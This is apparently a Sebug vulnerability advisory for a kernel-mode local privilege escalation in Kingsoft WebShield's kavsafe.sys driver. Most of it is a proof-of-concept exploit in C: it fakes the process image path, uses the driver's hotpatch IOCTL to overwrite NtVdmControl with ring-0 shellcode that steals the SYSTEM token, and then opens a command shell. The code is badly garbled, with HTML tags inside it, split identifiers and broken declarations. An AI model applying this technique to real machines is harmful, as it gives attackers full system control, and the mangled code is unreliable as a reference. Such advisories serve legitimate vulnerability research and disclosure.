Kingsoft WebShield kavsafe.sys <= 2010.4.14.609 (2010.5.23) Kernel Mode Local Privilege Escalation
Vulnerability. SSV ID: 19676 (http://sebug.net/vulndb/19676/). Title: WebShield kavsafe.sys <= 2010.4.14.609 (2010.5.23) Kernel Mode Local Privilege Escalation Vulnerability. Sebug appdir: Kingsoft. Release date: 2010-05-23. Information submitted by: yicong2010
(Yicong2010_at_yahoo.com)
Affected Versions:
Kingsoft WebShield <= 3.5.1.2 (2010.5.23)
Signature Date: 2010-5-23 2:33:54
And
KAVSafe.sys <= 2010.4.14.609
Signature Date: 2010-4-14 13:42:26
Vulnerability description:
Kavsafe.sys creates a device named \Device\KAVSafe and handles a DeviceIoControl request with IoControlCode = 0x830020d4 (this is the value of CTL_CODE(0x8300, 0x835, METHOD_BUFFERED, FILE_ANY_ACCESS) used in the test program below), which can be used to overwrite arbitrary kernel module data.
Reference:
None
Test method:
[www.sebug.net]
The program (method) provided on this site may be harmful and is intended only for security research and teaching. Use it at your own risk!
# Define ctl_code (0x8300, 0x835, method_buffered, file_any_access) <br/> typedef long (winapi * pnt_query_information_process) (<br/> handle processhandle, <br/> DWORD processinformationclass, <br/> pvoid processinformation, <br/> ulong processinformationlength, <br/> Pulong returnlength <br/> ); <br/> typedef struct _ string {<br/> ushort length; <br/> ushort maximumleng Th; <br/> pchar buffer; <br/>}string; <br/> typedef string * pstring; <br/> typedef struct _ rtl_drive_letter_curdir {<br/> ushort flags; <br/> ushort length; <br/> ulong timestamp; <br/> string dospath; <br/>} rtl_drive_letter_curdir, * delimiter; <br/> typedef struct _ unicode_string {<br/> ushort length; <br/> ushort maximumlength; <br/> pwstr buffer; <br/>} unicode_string; <br/> type Def unicode_string * punicode_string; <br/> typedef const unicode_string * pcunicode_string; <br/> # define rtl_max_drive_letters 32 <br/> # define rtl_drive_letter_valid) 0x0001 <br/> typedef struct _ curdir {<br/> unicode_string dospath; <br/> handle; <br/>}curdir, * pcurdir; <br/> typedef struct _ rtl_user_process_parameters {<br/> ulong maximumlength; <br/> ulong length; </P> <p> ulong flag S; <br/> ulong debugflags; </P> <p> handle consolehandle; <br/> ulong consoleflags; <br/> handle standardinput; <br/> handle standardoutput; <br/> handle standarderror; </P> <p> curdir currentdirectory; // processparameters <br/> unicode_string dllpath; // processparameters <br/> unicode_string imagepathname; // processparameters <br/> unicode_string CommandLine; // processparameters <br/> pvoid envir Onment; // ntallocatevirtualmemory </P> <p> ulong startingx; <br/> ulong startingy; <br/> ulong countx; <br/> ulong county; <br/> ulong countcharsx; <br/> ulong countcharsy; <br/> ulong fillattriags; </P> <p> ulong windowflags; <br/> ulong showwindowflags; <br/> unicode_string windowtitle; // processparameters <br/> unicode_string returns topinfo; // processparameters <br/> unicode_string shellinfo; // P Rocessparameters 
<br/> unicode_string runtimedata; // processparameters <br/> using currentdirectores [rtl_max_drive_letters]; <br/>} rtl_user_process_parameters, * parameters; <br/> typedef struct _ peb {<br/> Boolean inheritedaddressspace; // these four fields cannot change unless the <br/> Boolean readimagefileexecoptions; // <br/> Boolean beingdebugged; // <br /> Boolean sparebool; // <br/> handle mutant; // initial_peb structure is also updated. </P> <p> pvoid imagebaseaddress; <br/> pvoid LDR; <br/> struct _ rtl_user_process_parameters * processparameters; <br/>} peb, * ppeb; <br/> typedef long kpriority; <br/> typedef struct _ process_basic_information {<br/> long exitstatus; <br/> pvoid pebbaseaddress; <br/> ulong_ptr affinitymask; <br/> kpriority basepri Ority; <br/> ulong_ptr uniqueprocessid; <br/> ulong_ptr identifier; <br/>} process_basic_information, * pprocess_basic_information; <br/> typedef struct {<br/> ulong unknown1; <br/> ulong unknown2; <br/> pvoid base; <br/> ulong size; <br/> ulong flags; <br/> ushort index; <br/> ushort namelength; <br/> ushort loadcount; <br/> ushort pathlength; <br/> char imagename [1, 256]; <br/>} sys Struct, * struct; <br/> typedef struct {<br/> ulong count; <br/> system_module_information_entry module [1]; <br/>} x_system_module_information, * px_system_module_information; <br/> typedef long (winapi * pnt_query_system_information) (<br/> long systeminformationclass, <br/> pvoid systeminformation, <br/> ulong systeminformationlength, <br/> Pulong RET Urnlength <br/>); <br/> # define ntcurrentprocess () (handle) (long_ptr)-1) <br/> typedef long (winapi * pnt_vdm_control) (<br/> ulong service, <br/> pvoid servicedata <br/>); <br/> void _ declspec (naked) r0shellcodexp () <br/>{< br/>__ ASM <br/>{< br/> mov eax, 0xffdff124 <br/> mov eax, [eax] <br/> mov ESI, dword ptr [eax + 0x220] <br/> mov eax, ESI <br/> searchxp: <br/> mov eax, dword ptr [eax + 0x88] <br/> sub EA X, 0x88 <br/> mov edX, dword ptr [eax + 0x84] <br/> CMP edX, 4 <br/> jnz 
searchxp <br/> mov eax, dword ptr [eax + 0xc8] <br/> mov dword ptr [ESI + 0xc8], eax <br/> RET 8 <br/>}< br/> void nopnop () <br/>{< br/> printf ("Nop! /N "); <br/>}< br/> # include" malloc. H "<br/> int main (INT argc, char * argv []) <br/>{< br/> printf (" kswebshield kavsafe. sys <= 2010,04, 14,609/N "<br/>" kernel mode Privilege Escalation Vulnerability proof-of-concept/N "<br/>" 2010-5-23/N "<br/>" by lincoin/n/npress enter "); <br/> hkey; <br/> wchar installpath [max_path]; <br/> DWORD datatype; <br/> DWORD datasize = max_path * sizeof (wchar ); <br/> ulong Oldlen; <br/> pvoid poldbufferdata = NULL; <br/> If (regopenkey (HKEY_LOCAL_MACHINE, "software // Kingsoft // kswsvc", & hkey) = error_success) <br/>{< br/> If (regqueryvalueexw (hkey, l "programpath", null, & datatype, (lpbyte) installpath, & datasize )! = Error_success) <br/>{< br/> regclosekey (hkey); <br/> printf ("kswebshield not installed/N"); <br/> getchar (); <br/> return 0; <br/>}< br/> regclosekey (hkey ); <br/>}< br/> else <br/> {<br/> printf ("kswebshield not installed/N"); <br/> getchar (); <br/> return 0; <br/>}< br/> wcscat (installpath, l "// kavinst.exe"); </P> <p> process_basic_information PBI; <br/> pnt_query_information_process pntqueryinformationpr Ocess; </P> <p> pntqueryinformationprocess = (pnt_query_information_process) getprocaddress (getmodulehandle ("NTDLL. DLL ")," ntqueryinformationprocess "); </P> <p> pntqueryinformationprocess (ntcurrentprocess (), 0, & PBI, sizeof (PBI), null ); <br/> ppeb peb; <br/> peb = (ppeb) PBI. pebbaseaddress; <br/> oldlen = peb-> processparameters-> imagepathname. length; <br/> peb-> processparameters-> imagepathname. length = Wcslen (installpath) * sizeof (wchar); <br/> poldbufferdata = malloc (peb-> processparameters-> imagepathname. length); <br/> rtlcopymemory (poldbufferdata, peb-> processparameters-> imagepathname. buffer, peb-> processparameters-> imagepathname. length); <br/> rtlcopymemory (peb-> processparameters-> imagepathname. 
buffer, installpath, peb-> processparameters-> imagepathname. length); <br/> handle hdev = createfile ("////. // Kavsafe ", <br/> file_read_attributes, <br/> file_share_read, <br/> 0, <br/> open_existing, <br/> 0, <br/> 0); <br/> If (hdev = invalid_handle_value) <br/>{< br/> printf ("cannot open device % u/N ", getlasterror (); <br/> getchar (); <br/> return 0; <br/>}< br/> rtlcopymemory (peb-> processparameters-> imagepathname. buffer, poldbufferdata, peb-> processparameters-> imagepathname. length); <br/> peb-> Process Parameters-> imagepathname. length = (ushort) oldlen; </P> <p> pnt_query_system_information pntquerysysteminformation; <br/> pntquerysysteminformation = (pnt_query_system_information) getprocaddress (getmodulehandle ("NTDLL. DLL ")," ntquerysysteminformation "); <br/> x_system_module_information sysmod; <br/> hmodule kernelhandle; <br/> pntquerysysteminformation (0xb, & sysmod, sizeof (sysmod ), null); </P> <p> K Ernelhandle = loadlibrary (strrchr (sysmod. module [0]. imagename, '//') + 1); </P> <p> If (kernelhandle = 0) <br/>{< br/> printf ("cannot load ntoskrnl! /N "); <br/> getchar (); <br/> return 0; <br/>}< br/> pvoid pntvdmcontrol = getprocaddress (kernelhandle, "ntvdmcontrol"); <br/> If (pntvdmcontrol = 0) <br/> {<br/> printf ("cannot find ntvdmcontrol! /N "); <br/> getchar (); <br/> return 0; <br/>}< br/> pntvdmcontrol = (pvoid) (ulong) pntvdmcontrol-(ulong) kernelhandle); <br/> printf ("ntvdmcontrol = % 08x", pntvdmcontrol); </P> <p> getchar (); <br/> ulong shellcodesize = (ulong) nopnop-(ulong) r0shellcodexp; <br/> ulong pshellcode = (ulong) r0shellcodexp; </P> <p> pvoid DATA = malloc (0x48 + shellcodesize); <br/> copymemory (pvoid) (ulong) Data + 0x48), r0sh Ellcodexp, shellcodesize); </P> <p> char modulename [68] = "ntoskrnl.exe"; <br/> rtlcopymemory (data, modulename, sizeof (modulename )); <br/> * (ulong *) (ulong) Data + 64) = (ulong) pntvdmcontrol; <br/> * (ulong *) (ulong) Data + 68) = shellcodesize; </P> <p> ulong BTR; <br/> If (! 
Deviceiocontrol (hdev, <br/> ioctl_hotpatch_kernel_module, <br/> data, <br/> 0x48 + shellcodesize, <br/> null, <br/> 0, <br/> & BTR, 0 <br/>) <br/> {<br/> printf ("cannot device Io control! % U/N ", getlasterror (); <br/> getchar (); <br/> return 0; <br/>}< br/> closehandle (hdev ); <br/> pnt_vdm_control pr3ntvdmcontrol = (pnt_vdm_control) getprocaddress (getmodulehandle ("NTDLL. DLL ")," ntvdmcontrol "); <br/> pr3ntvdmcontrol (0, 0); </P> <p> winexec (" cmd.exe ", sw_show ); <br/> printf ("OK! /N "); <br/> getchar (); <br/> return 0; <br/>}< br/>
Address: http://sebug.net/vulndb/19676/